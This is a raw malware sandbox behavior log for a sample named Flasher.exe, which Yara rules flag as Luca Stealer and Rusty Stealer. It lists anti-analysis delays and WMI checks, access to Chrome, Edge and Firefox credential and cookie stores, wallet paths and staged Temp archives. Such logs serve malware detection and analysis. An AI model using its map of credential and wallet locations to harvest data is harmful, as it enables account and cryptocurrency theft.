Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3328			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2678			Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-90215

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep count: 3328 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep count: 2678 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard

Source: C:\Users\user\Desktop\Flasher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D35DF7C0 CloseHandle,memset,FindFirstFileW,FindClose,HeapFree,

0_2_00007FF6D35DF7C0

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D371D91C memset,GetSystemInfo,

0_2_00007FF6D371D91C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Flasher.exe, 00000000.00000003.1760408069.000001EE77891000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000002.1761203830.000001EE77891000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D373885F GetProcessHeap,HeapAlloc,

0_2_00007FF6D373885F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D37328B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00007FF6D37328B0

Source: C:\Users\user\Desktop\Flasher.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName"

Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D352257A memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,WaitForSingleObject,GetLastError,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,memmove,AllocateAndInitializeSid,memmove,memmove,memmove,memmove,EnumDisplayMonitors,CloseHandle,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,

0_2_00007FF6D352257A

Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\Flasher.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Desktop\ZBEDCJPBEY.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\DTBZGIOOSO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\DVWHKMNFNN.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\KATAXZVCPS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\NWTVCDUMOB.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\ONBQCLYSPU.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\ONBQCLYSPU.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\XZXHAVGRAG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\XZXHAVGRAG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\XZXHAVGRAG.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\Documents\YPSIACHYXW.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\cookies_google_default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\cookies_google_default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\screen1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\screen1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\sensfiles.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\sensfiles.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\user_info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\user_info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

0_2_00007FF6D352257A

Source: C:\Users\user\Desktop\Flasher.exe

0_2_00007FF6D352257A

Source: C:\Users\user\Desktop\Flasher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Luca Stealer

Source: Yara match	File source: Flasher.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Flasher.exe.7ff6d34f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR

Yara detected Rusty Stealer

Source: Yara match

File source: Process Memory Space: Flasher.exe PID: 7284, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\ata0
Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\ata0
Source: Flasher.exe, 00000000.00000002.1761203830.000001EE77921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Wallets\Jaxx\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\mnal
Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Flasher.exe, 00000000.00000003.1759114895.000001EE7792E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: Flasher.exe, 00000000.00000002.1761203830.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_0\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens-journal\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links\Login Data	Jump to behavior
